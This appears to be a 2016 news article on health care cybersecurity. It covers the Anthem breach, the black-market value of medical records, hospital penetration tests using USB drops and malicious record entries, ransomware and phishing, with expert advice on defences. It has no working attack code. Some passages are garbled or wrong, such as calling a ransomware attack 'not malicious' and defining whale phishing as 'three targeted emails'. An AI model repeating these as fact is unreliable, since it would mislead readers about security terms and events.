Anthem made history in February 2015 when 78.8 million of the company's customers got hacked. This was the biggest health care breach in history, and during a landmark year really opened the floodgates. The Health and Human Services' Office of Civil Rights (OCR) reported that last year over 113 million medical records were in some way compromised. Think of it this way: if each of these cases represented one person, then one out of every three Americans would be victims.
By comparison this year is looking tame. However, it is just March, and already 3.5 million medical records have been compromised. A list furnished by the U.S. Department of Health and Human Services shows that there have been nearly four data breaches on average per week in the health care industry to date in 2016.
Avi Rubin, an information security expert and computer scientist, said in January at the USENIX Enigma Conference while discussing hospital cybersecurity's current state, that is pretty bad when you think about it, since all of us have interactions with our health care system.
Before being named as the direct of the Health and Medical Security Lab at Johns Hopkins University, Rubin provide cybersecurity services for companies that were part of many different industries, including retail stores, car rental companies and banks. However, he said when it came to cybersecurity problems that the absolute worst was the health care sector.
Rubin said the data security practices within the health care industry were far beneath all other industries.
In fact, in 2015, the health care sector was ranked second for U.S. data breaches and on the global hacking report from Verizon placed within the top 10.
So how do things look on the front lines? Reportedly, CIO John Halamka stated at South by Southwest that Beth Israel Deaconess in Boston gets hacked once every seven seconds. In 2011, 2,000 patient X-rays were stolen by cybercriminals in China from Beth Israel Deaconess. According to Halamka, quite often the scans are sold to Chinese citizens who are unable to pass health exams for their travel visas.
However, medial cybersecurity doesn't get much mention in mainstream discussions, like on the campaign trail. During the Republican presidential debates, the words "cyber warfare," "cyber attack" and "hack" were mention only 16 times. For Democratic candidates it is even a worse record, with "cyber warfare" being mentioned only once by Senator Jim Webb at the October 13th debate. During their primary debates, neither one of the major parties have used any of those terms in relation to health care cybersecurity.
The following are three reasons why everybody should be concerned.
1. Health records have turned into currency
According to James Scott, senior fellow and co-founder of the Institute for Critical Infrastructure Technology (ICIT) located in Washington D.C., these days when compared to stolen credit cards, electronic health records are considered to be 100 times more valuable. Institute members hold meetings on a regular basis between tech experts and lawmakers to help foster cybersecurity policy. Although there are numerous safeguards in existence for financial information, there are not as many protections for health data, which according to Scott is a lot more valuable.
Money is insured with credit cards. When the bank is backed by the FDIC, most individuals whose credit card numbers are stolen don't end up losing money, says Scott. The difference will be made up by the banks. However, with electronics, the payoff is the main reason why insurance companies and hospitals are such large targets.
Scott said that on darkweb forums one Medicaid or Medicare electronic health record can bring in $500. The global information service Experian has estimated that on the black market that health records have a worth as much as 10 times higher than credit card numbers.
Scott said, if you buy 100 electronic health records, it gets you everything on the individuals, their addresses, social security numbers, their jobs,their children. Malicious individuals like having as much intelligence as possible, and for both experienced and non-experienced hackers, the easiest thing to attack is health care.
The healthcare industry loses an estimated $5.6 billion a year due to data breaches.
2. The cybersecurity at your hospital may be leaky
Health care is part of cybersecurity space that is quite vulnerable. With the increase in personalized medicine, self-care and health frackers, regulators, doctors and patients want to have easier means of accessing patient information. Rubin said that without the right digital protections, it can be very dangerous to open up the massive highways for storing and sharing data.
Over the past two years Independent Security Evaluators, as part of an experiment that was designed for identifying vulnerabilities, tried to penetrating the cybersecurity of two health care data centers and 12 health care facilities in the U.S. They were hired to do this.
The team at one hospital was able to hack into a computerized medicine dispensary through littering several of its floors with USB sticks that contained malware. Each of the 18 USBs had the logo of the hospital on it, which might have been sufficient to convince an unsuspecting employee to use it. If it had been a malicious hack, the attacker might have altered drug dosages, which could potentially be a life-threatening situation for a patient. In another hospital, an unguarded lobby kiosk was used for accessing patient blood work records. Theoretically these could have been switched so that improper treatment was administered.
Independent Security Evaluators reports that websites are another target for cybercriminals. The team posed as a patient and logged into an electronic health record site, however the patient information fields were filled in with malicious code. Then once the new patient information as viewed by an unsuspecting nurse or doctor, the code was installed, which gave the hacker complete ability to modify all patient health records that were part of the data, according to a published report from Independent Security Evaluators.
Rubin recommends policies such as multifactor authentication, limitations on who is allowed to look at medical charts for preventing breaches at hospitals, and encrypting all patient data. He also said that number of searches made on a hospital database should be monitored as well, in order to catch situations where hackers might be downloading large health record batches at one time.
3. You could be missing your cybersecurity's largest flaw
The is because you are probably the largest flaw in your personal cybersecurity.
A great example of this is the ongoing problem of ransomware. Ransomware holds a victims digital files or computer hostage through encrypting them. It has existed in different forms since 1989. Crypto ransomware - its latest incarnation has been spreading like wildfire ever since it emerged three years ago. During the last quarter of 2014, over 128,000 desktop computers got hit with ransomware. By mid 2015, the number had doubled to 337,000 incidents.
Hollywood Presbyterian Medical Center got hit with ransomware in February, becoming its most recent high-profile victim. Allen Stefanek, hospital CEO and president, described the attack as a random attack and clearly not malicious, which indicates that a tainted email was the main route used for the ransomware. According to the ICIT, the medical center got hit by Locky crypto-ransomware. It comes in the form of an email attachment as a Word document in a person's inbox.
This type of attack is referred to as phishing - where malicious code is masked by hackers inside of a legitimate-looking webpage or email. The fake correspondence is loaded with features that are designed to get a victim to click - which is referred to as social engineering.
These hacks come in two common versions that are known are whale phishing and spear phishing. They have been designed to capitalize on trust and human nature. The celebrity nude photograph hack is spear phishing via email. A teenager was able to crack into the email of CIA Director John Brennan through phishing an employee at Verizon over the phone.
Scott said that spear phishing is when an enemy emails you and it appears to be from a legitimate sender. However, when you look at the url more closely, @newshour.org might be @newshour,co or something like that. Whale phishing occurs when three highly targeted emails are sent. A few emails are designed by the hackers by tailoring them via social engineering research they gather through social media and anything else you might post about yourself online.
According to Scott, cyberthieves frequently gain intelligence from social medial platforms such as LinkedIn.
They are able to see where you work, where you attended college. They can even dig digger and look you up on Facebook and determine whether you are married or not. It usually just comes down to doing their homework.
Scott adds that the key to preventing phishing attacks from occurring at hospitals is education.
He said that insurance companies and hospitals need to provide their employees with education on things like what spear phishing attack or spoofed browser or fake email look like. And then when they receive one of those strange things, that they should be forwarded to information security.
The suspicious email can then be opened on a virtual private network, so that the malicious codes doesn't ever gain access to the company's network or computers.
Recently President Obama made an announcement for the Cybersecurity National Action Plan, where $62 million is being committed to educating cybersecurity personnel. However there is no mention of regular people being trained on social engineering that is used by hackers. If individuals keeping opening doors for malicious code, there are no IT employees or high-tech encryption security software that can stop it.
Scott said that people need to be trained to not click. It is actually a hard thing to teach people to just not click.